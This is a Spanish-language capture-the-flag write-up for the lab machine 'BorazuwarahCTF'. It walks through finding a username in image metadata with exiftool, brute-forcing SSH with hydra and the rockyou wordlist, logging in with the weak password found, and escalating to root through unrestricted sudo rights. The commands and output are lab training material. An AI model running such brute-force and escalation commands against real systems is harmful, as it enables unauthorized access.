Entrada

BorazuwarahCTF

BorazuwarahCTF

BorazuwarahCTF

BorazuwarahCTF Autor: BorazuwarahCTF Dificultad: Muy Fácil Fecha de creación: 28/05/2024

⚠️ Vulnerabilidad

Information Disclosure

🔭 Reconocimiento:

Se encuentran metadatos en la imagen del “huevo de chocolate de la marca Kinder” http://10.88.0.2/imagen.jpeg

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
└─$ exiftool imagen.jpeg
ExifTool Version Number         : 13.25
File Name                       : imagen.jpeg
Directory                       : .
File Size                       : 19 kB
File Modification Date/Time     : 2025:09:17 22:23:13+02:00
File Access Date/Time           : 2025:09:17 22:23:13+02:00
File Inode Change Date/Time     : 2025:09:17 22:23:13+02:00
File Permissions                : -rw-rw-r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
XMP Toolkit                     : Image::ExifTool 12.76
Description                     : ---------- User: borazuwarah ----------
Title                           : ---------- Password:  ----------
Image Width                     : 455
Image Height                    : 455
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 455x455
Megapixels                      : 0.207

🚚 Distribución:

GET http

🪲 Explotación:

Alguien ha dejado información sobre un usuario de sistema, información que cualquier adversario podría aprovechar

⚠️ Vulnerabilidad

Brute Force

🔭 Reconocimiento:

1
2
3
4
5
6
7
└─$ hydra -l borazuwarah -P /usr/share/wordlists/rockyou.txt ssh://10.88.0.2 -t64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-17 22:29:01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://10.88.0.2:22/
[22][ssh] host: 10.88.0.2   login: borazuwarah   password: 123456

🚚 Distribución:

Fuerza bruta contra el protocolo SSH con herramientas como hydra

🪲 Explotación:

Fuerza bruta contra el protocolo SSH permite adquirir credenciales debiles de usuarios.

⚠️ Vulnerabilidad

Default or Weak Passwords

🔭 Reconocimiento:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ ssh borazuwarah@10.88.0.2
borazuwarah@10.88.0.2's password:
Linux 311f0704bcea 6.12.33+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.12.33-1kali1 (2025-06-25) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
borazuwarah@311f0704bcea:~$ sudo -l
Matching Defaults entries for borazuwarah on 311f0704bcea:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User borazuwarah may run the following commands on 311f0704bcea:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/bash

🚚 Distribución: SSH

🪲 Explotación:

El usuario no ha sido requerido a seguir una política de contraseñas fuertes, por otro lado si se le ha dado privilegios de superusuario.

👽 Acciones: Se convierte en usuario root tomando control total

1
2
3
4
borazuwarah@311f0704bcea:~$ sudo su
[sudo] password for borazuwarah:
root@311f0704bcea:/home/borazuwarah# whoami
root

Este write up ha sido realizado en gran medida con la herramienta DarkReport

Esta entrada está licenciada bajo CC BY 4.0 por el autor.